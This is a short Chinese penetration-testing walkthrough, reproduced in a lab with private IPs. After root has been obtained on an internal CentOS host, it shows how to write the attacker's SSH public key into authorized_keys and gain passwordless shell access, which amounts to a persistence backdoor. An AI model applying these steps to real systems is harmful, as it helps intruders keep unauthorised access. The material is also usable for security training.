無密碼正向直連內網linux目標機復現
阿新 • • 發佈:2020-12-29
無密碼正向直連內網linux目標機復現
文章來自sxf大佬klion
https://mp.weixin.qq.com/s/GPPvci8qKuvc5d3Q7Cer7Q
場景說明
前期通過一些 Rce,提權 或者其它方式,拿到內網一臺linux 目標機的root許可權,但使用者密碼hash跑不出來,機器無法正常出網,Webshell 裡操作實在是麻煩, 費勁,為了能更方便的進行後續的內網滲透操作,現在就迫切需要一個真正的pts終端,怎麼搞 ?
復現
目標機:centos7 192.168.232.128
攻擊機:kali 192.168.232.129
0x01 攻擊機生成金鑰
# cd ~/.ssh //沒有自己建 # ssh-keygen -t rsa //一直回車就OK,在/root/.ssh/id_rsa.pub檔案這個是我們需要上傳到目標伺服器上的
0x02 rz上傳檔案至目標伺服器
如何伺服器不支援請安裝
yum -y install lrzsz
然後rz -be 上面的id_rsa.pub
0x03 匯入檔案
把id_rsa.pub匯入authorized_keys檔案,沒有這個檔案自己建立
cat id_rsa.pub > ~/.ssh/authorized_keys
0x04 直接連線
攻擊機直接使用ssh連線
ssh 192.168.232.128
這裡可以使用rpm -qa | grep ssh檢視目標是否安裝ssh服務